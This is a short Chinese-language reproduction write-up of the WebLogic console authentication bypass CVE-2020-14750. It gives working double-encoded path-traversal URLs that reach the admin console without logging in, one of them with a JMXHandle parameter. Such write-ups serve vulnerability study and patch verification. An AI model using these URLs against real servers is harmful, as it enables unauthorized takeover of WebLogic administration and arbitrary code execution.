WebLogic权限绕过(CVE-2020-14750)

漏洞描述:

Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。

Oracle WebLogic Server Oracle Fusion Middleware Console 多版本存在安全漏洞,该漏洞是CVE-2020-14882 补丁的绕过,远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,从而执行任意代码。

复现过程:

1.访问

​http://ip:port/console/login/LoginForm.jsp

WebLogic权限绕过(CVE-2020-14750)_第1张图片

2.Edge浏览器绕过登陆的url

WebLogic权限绕过(CVE-2020-14750)_第2张图片

3.访问如下链接,火狐浏览器或者谷歌浏览器可以绕过登录

http://ip:port/console/css/%252e%252e%252fconsole.portal
http://ip:port/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=DomainConfigGeneralPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29​

也可以绕过登录

WebLogic权限绕过(CVE-2020-14750)_第3张图片

你可能感兴趣的:(chrome,web安全)